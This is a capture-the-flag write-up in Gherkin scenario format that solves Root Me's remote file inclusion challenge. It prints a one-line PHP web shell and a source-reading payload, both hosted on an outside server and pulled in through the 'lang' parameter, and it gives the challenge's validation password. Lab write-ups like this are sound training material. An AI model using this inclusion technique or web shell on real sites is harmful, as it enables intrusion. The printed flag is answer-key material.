## Version 2.0
## language: en

Feature:  Web Server - Root Me
  Site:
    www.root-me.org
  Category:
    Web Server
  User:
    jdanilo7
  Goal:
    Get the PHP source code exploiting remote file inclusion.

  Background:
  Hacker's software
    |     <Software name>      |    <Version>    |
    |     Firefox Quantum      |      65.0.2     |
  Machine information:
    Given The challenge url
    """
    http://challenge01.root-me.org/web-serveur/ch13/
    """
    And The challenge statement
    """
    Get the PHP source code.
    """
    Then I am asked to get a flag exploiting remote file inclusion

  Scenario: Fail: Include a backdoor shell file
    Given I click the "Start the challenge" button
    Then I am redirected to a page with two links to select the site language
    And when I click the one that says "Francais", I am redirected to
    """
    http://challenge01.root-me.org/web-serveur/ch13/?lang=fr
    """
    And the loaded web page shows text in French
    Given I have a "shell.txt" file containing the following code
    """
    1  <?
    2    system($cmd);
    3  ?>
    """
    And it is hosted on a personal server on https://www.000webhost.com
    And I enter the following address into my browser address bar
    """
    http://challenge01.root-me.org/web-serveur/ch13/?lang=https://
    cookiesgather.000webhostapp.com/shell.txt&&cmd=ls
    """
    Then I get this warning
    """
    Warning: include(https://cookiesgather.000webhostapp.com/shell.txt_lang.
    php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found
    in /challenge/web-serveur/ch13/index.php on line 18 Warning: include():
    Failed opening 'https://cookiesgather.000webhostapp.com/shell.txt_lang.php
    ' for inclusion (include_path='.:/usr/share/php') in /challenge/web-
    serveur/ch13/index.php on line 18
    """
    And I don't get the flag
    And I conclude the payload file name should end with "_lang.php"

  Scenario: Success: Disable php code execution on the personal server
    Given I have disabled php code execution on my personal server
    And I have done so by adding this line to my .htaccess file
    """
    php_flag engine off
    """
    And I have uploaded a "readindex_lang.php" file to my personal server
    And it contains the following lines
    """
    1  <?php
    2    $file = fopen("index.php", "r");
    3    $contents = fread($file, filesize("index.php"));
    4    echo '<pre>'.$contents.'</pre>';
    5  ?>
    """
    And I enter the following address into my browser address bar
    """
    http://challenge01.root-me.org/web-serveur/ch13/?lang=https://
    cookiesgather.000webhostapp.com/readindex
    """
    Then the web page is loaded differently
    Given I use the browser's View Page Source tool
    Then I find these lines are part of the newly loaded web page
    """
    7  /*
    8
    9  Congratz!
    10
    11  Le mot de passe de validation est :
    12  The validation password is :
    13
    14  R3m0t3_iS_r3aL1y_3v1l
    15
    16*/
    """
    And I validate the flag on the challenge website
    And it is accepted
